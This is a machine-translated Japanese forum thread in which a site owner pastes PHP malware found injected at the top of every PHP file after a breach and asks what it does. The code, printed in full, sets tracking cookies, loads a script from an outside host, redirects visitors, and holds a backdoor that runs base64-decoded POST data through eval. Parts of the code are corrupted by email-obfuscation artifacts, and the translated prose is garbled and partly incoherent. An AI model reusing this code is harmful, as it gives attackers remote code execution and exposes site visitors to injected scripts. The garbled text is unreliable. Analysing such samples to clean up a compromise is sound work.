私たちのサーバーは、いくつかのSQLインジェクションメソッド(今パッチが適用されています)によってハッキングされています。私たちのすべてのPHPファイルには、これが各ファイルの最上位に追加されています。Got Hacked - このPHPコードは何を知っていますか?
global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if([email protected]$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if([email protected]_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if([email protected]_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"][email protected]$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
クッキーを設定しているようですが、私はそれが何をしているのか最初に考えていません。
作成される潜在的に任意のこれが何を理解することができ専門家とどのようなクッキーの名前がそうのように見えることがあり、私は、などエクスプロイト見 はZenphotoの中にプラグインによるものであった
UPDATEを任意のユーザーに伝えることができますギャラリーソフトウェアはTiny_MCEと呼ばれています。
なぜSQLインジェクションでタグ付けされましたか? –
私が興味を持っているのは、SQLインジェクションが攻撃者のファイルシステムへのアクセスをどのように獲得したかです。 –
今、同じことがありました。私は、膨大なファイルで掘り起こすのではなく完全な復元を行うことにしました。これは、.phpファイルにクッキースクリプトを追加したもので、Dave氏の言うとおり、htaccessにはすべてが潜んでいます。リダイレクトされ、ある時点であなたのサイトはブラックリストに載せられます。あまりいいことではありません。すべての幸運。 – Benteh